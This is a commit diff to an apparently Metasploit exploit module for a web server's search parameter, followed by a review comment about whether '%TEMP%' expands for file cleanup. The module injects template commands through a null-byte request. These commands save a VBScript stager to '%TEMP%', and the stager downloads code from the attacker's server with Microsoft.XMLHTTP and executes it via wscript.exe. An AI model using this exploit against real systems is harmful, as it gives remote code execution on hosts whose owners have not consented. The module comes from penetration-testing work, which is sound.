Use %TEMP% and update ranking

bug/bundler_fix
jvazquez-r7 2014-10-08 12:12:00 -05:00
parent d90fe4f724
commit 98b69e095c
1 changed files with 7 additions and 10 deletions


@ -6,7 +6,7 @@
require 'msf/core' require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpServer
@ -49,7 +49,6 @@ class Metasploit3 < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('TARGETURI', [true, 'The path of the web application', '/']), OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
OptString.new('SAVE_PATH', [true, 'Target writable path', 'c:\\']),
OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]), OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]),
], self.class) ], self.class)
end end
@ -86,6 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
file_name = rand_text_alpha(rand(10)+5) file_name = rand_text_alpha(rand(10)+5)
file_ext = '.vbs' file_ext = '.vbs'
file_full_name = file_name + file_ext file_full_name = file_name + file_ext
vbs_path = "%TEMP%\\#{file_full_name}"
vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a" vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a"
vbs_code << "On Error Resume Next\x0d\x0a" vbs_code << "On Error Resume Next\x0d\x0a"
@ -97,27 +97,24 @@ class Metasploit3 < Msf::Exploit::Remote
vbs_code << "Execute x.responseText" vbs_code << "Execute x.responseText"
payloads = [ payloads = [
"save|#{datastore['SAVE_PATH']}#{file_full_name}|#{vbs_code}", "save|#{vbs_path}|#{vbs_code}",
"exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_full_name}" "exec|wscript.exe //B //NOLOGO #{vbs_path}"
] ]
print_status("Sending a malicious request to #{target_uri.path}") print_status("Sending a malicious request to #{target_uri.path}")
payloads.each do |payload| payloads.each do |payload|
res = send_request_raw({ send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => "/?search=%00{.#{URI::encode(payload)}.}" 'uri' => "/?search=%00{.#{URI::encode(payload)}.}"
}) })
if res
print_status("#{res.code}\n#{res.body.to_s}")
end
end end
register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}") register_file_for_cleanup(vbs_path)
end end
def exploit def exploit
begin begin
Timeout.timeout(datastore['HTTPDELAY']) { super } Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error rescue Timeout::Error
# When the server stops due to our timeout, this is raised # When the server stops due to our timeout, this is raised
end end
end end
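Review bot: `register_file_for_cleanup(vbs_path)` in the last hunk now receives the literal string `%TEMP%\<name>.vbs`, so the dropped script is removed only if the cleanup code expands the variable in the session's environment, which this diff does not show. With the removed `SAVE_PATH` option the cleanup path was whatever absolute path the operator supplied. Now it depends on the session resolving `%TEMP%` to the same directory the server process used when it wrote the file, and if the two differ the `.vbs` stays behind on the tested host. I would confirm the expansion behaviour for each session type and record it next to the call, for example `# %TEMP% is expanded on the target; cleanup relies on the session resolving the same directory`. The enclosing method starts outside the hunk, so any earlier handling of the path is not visible here.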